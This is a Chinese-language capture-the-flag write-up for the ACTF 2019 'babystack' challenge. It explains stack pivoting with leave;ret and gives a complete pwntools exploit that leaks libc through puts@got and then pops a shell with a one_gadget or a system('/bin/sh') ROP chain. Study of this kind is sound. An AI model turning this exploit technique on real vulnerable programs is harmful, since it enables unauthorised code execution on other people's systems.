actf_2019_babystack

步骤

1. 例行检查：64 位程序，开启了 NX 保护；从下面 exp 里直接硬编码 0x400xxx 的 gadget 地址来看，程序应该没有开 PIE（否则这些地址每次运行都会变）。


2.64位ida载入


3. 栈迁移主要就是利用 leave 和 ret 这两条指令，两条指令的实质是

leave: mov rsp, rbp ; pop rbp
ret:   pop rip

（注意 ret 弹出的是返回地址到 rip，不是 "pop rdi"；pop rdi 是后面 ROP 链里另外找的 gadget。）把保存的 rbp 覆盖成缓冲区地址、返回地址覆盖成 leave;ret gadget 之后的流程是：函数自己的 leave 先把 rbp 改成缓冲区地址，ret 跳到 gadget；gadget 里的 mov rsp, rbp 把栈顶迁到缓冲区，pop rbp 吃掉缓冲区开头的 8 字节（对应 exp 里的 'a'*8），紧接着的 ret 就从缓冲区 +8 处开始执行我们布置的 ROP 链。


4.exp

from pwn import*
from LibcSearcher import*

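# ---------------------------------------------------------------------------
# Exploit for ACTF 2019 "babystack": pivot the stack (leave; ret) into the
# message buffer, whose address the program prints, leak puts@libc through
# puts@got, then return to main and run a shell chain.
#
# Written for Python 3 pwntools: every payload is bytes. The original
# str/bytes mixing ('a'*8 + p64(...)) only runs on Python 2.
# ---------------------------------------------------------------------------

BINARY = './ACTF_2019_babystack'
# Must be the libc the target process really loads: ONE_GADGET_OFF below was
# taken from this file and is meaningless for any other build.
LIBC = '/lib/x86_64-linux-gnu/libc.so.6'

# Gadgets inside the binary (hard-coded, so this assumes the binary is not PIE).
POP_RDI = 0x0000000000400ad3    # ROPgadget --binary ACTF_2019_babystack | grep 'pop rdi'
LEAVE_RET = 0x0000000000400a18  # ROPgadget --binary ACTF_2019_babystack | grep 'leave'
MAIN = 0x4008F6                 # return here after the leak to get a second round
RET = 0x0000000000400a4f        # lone `ret`: keeps rsp 16-byte aligned before system()

# Buffer layout: the saved rbp sits SAVED_RBP_OFF bytes into the message and the
# return address directly after it, so a MSG_LEN-byte message overwrites both.
SAVED_RBP_OFF = 0xd0
MSG_LEN = SAVED_RBP_OFF + 16    # 0xe0

# one_gadget /lib/x86_64-linux-gnu/libc.so.6 -- local and remote libc differ,
# recompute it for the remote one. Also check the constraints one_gadget
# prints for it (e.g. [rsp+N] == NULL); shell_chain() NUL-fills the fake
# frame to help with that, but rsp alignment after the pivot depends on the
# leaked buffer address -- TODO confirm the gadget fires on the target.
ONE_GADGET_OFF = 0x4f3d5

# True: jump straight to the one_gadget (the original script's active path).
# False: classic pop rdi; "/bin/sh"; ret; system; main chain.
USE_ONE_GADGET = True


def pivot_payload(chain, stack_addr):
    """Build the MSG_LEN-byte message that pivots execution onto the buffer.

    Layout, with the buffer at ``stack_addr`` (the program leaks it):

      [0x00:0x08]  fake rbp, consumed by the ``pop rbp`` of the pivoting ``leave``
      [0x08:...]   ``chain`` -- popped by the ``ret`` that follows that ``pop``
      [...:0xd0]   'a' padding
      [0xd0:0xd8]  saved rbp := stack_addr  (epilogue ``leave`` -> rbp = buffer)
      [0xd8:0xe0]  return address := LEAVE_RET (mov rsp, rbp; pop rbp; ret -> chain)

    Uses int.to_bytes instead of p64 so the helper has no pwntools dependency.

    Args:
        chain: raw, already packed ROP chain. May be empty.
        stack_addr: address of the message buffer on the stack.

    Returns:
        Exactly MSG_LEN bytes.

    Raises:
        ValueError: if ``chain`` does not fit between the fake rbp and the saved rbp.
    """
    body = b'a' * 8 + chain
    if len(body) > SAVED_RBP_OFF:
        raise ValueError('ROP chain too long: %d bytes, at most %d fit'
                         % (len(chain), SAVED_RBP_OFF - 8))
    body = body.ljust(SAVED_RBP_OFF, b'a')
    return (body
            + stack_addr.to_bytes(8, 'little')
            + LEAVE_RET.to_bytes(8, 'little'))


def ask_length(r):
    """Answer the length prompt with MSG_LEN and return the leaked buffer address.

    The program prints the buffer address after "at "; that leak is what makes
    the pivot possible without a separate stack-address leak.
    """
    r.recvuntil(b'How many bytes of your message?')
    r.sendline(str(MSG_LEN).encode())
    r.recvuntil(b'at ')
    return int(r.recvuntil(b'\n', drop=True), 16)


def send_content(r, payload):
    """Deliver the message body.

    send(), not sendline(): the payload is already the MSG_LEN bytes we
    declared, a trailing newline would be one byte too many.
    """
    r.recvuntil(b'What is the content of your message?')
    r.send(payload)


def leak_libc_base(r, libc):
    """Read the address puts() printed after "Byebye~" and derive the libc base.

    puts stops at the first NUL byte; a 64-bit user-space address has its top
    two bytes zero, so it arrives as 6 bytes and is padded back to 8.

    Raises:
        RuntimeError: if the base is not page aligned, i.e. the leak was
            garbled or LIBC is not the libc the target loaded.
    """
    r.recvuntil(b'Byebye~\n')
    puts_addr = u64(r.recv(6).ljust(8, b'\x00'))
    libc_base = puts_addr - libc.sym['puts']
    if libc_base & 0xfff:
        raise RuntimeError('libc base 0x%x is not page aligned: bad leak or wrong LIBC'
                           % libc_base)
    log.info('puts@libc = 0x%x  libc base = 0x%x' % (puts_addr, libc_base))
    return libc_base


def shell_chain(libc, libc_base):
    """Return the round-two ROP chain, chosen by USE_ONE_GADGET."""
    if USE_ONE_GADGET:
        chain = p64(libc_base + ONE_GADGET_OFF)
        # NUL-fill the rest of the fake frame so [rsp+N] reads as NULL for the
        # gadget's constraints. NULs inside the message are fine: p64(LEAVE_RET)
        # already carries five of them and lands intact.
        return chain + b'\x00' * (SAVED_RBP_OFF - 8 - len(chain))
    system = libc_base + libc.sym['system']
    binsh = libc_base + next(libc.search(b'/bin/sh'))
    # RET realigns the stack for the movaps inside system().
    return p64(POP_RDI) + p64(binsh) + p64(RET) + p64(system) + p64(MAIN)


def main():
    """Run the two-round exploit against a local process."""
    r = process(BINARY)
    elf = ELF(BINARY)
    libc = ELF(LIBC)
    # gdb.attach(r)

    # Round 1: pivot into puts(puts@got), then return to main for round 2.
    stack_addr = ask_length(r)
    leak_chain = p64(POP_RDI) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(MAIN)
    send_content(r, pivot_payload(leak_chain, stack_addr))
    libc_base = leak_libc_base(r, libc)

    # Round 2: main runs again with a fresh frame, so re-read the buffer
    # address instead of reusing the round-1 value.
    stack_addr = ask_length(r)
    send_content(r, pivot_payload(shell_chain(libc, libc_base), stack_addr))
    r.interactive()


if __name__ == '__main__':
    main()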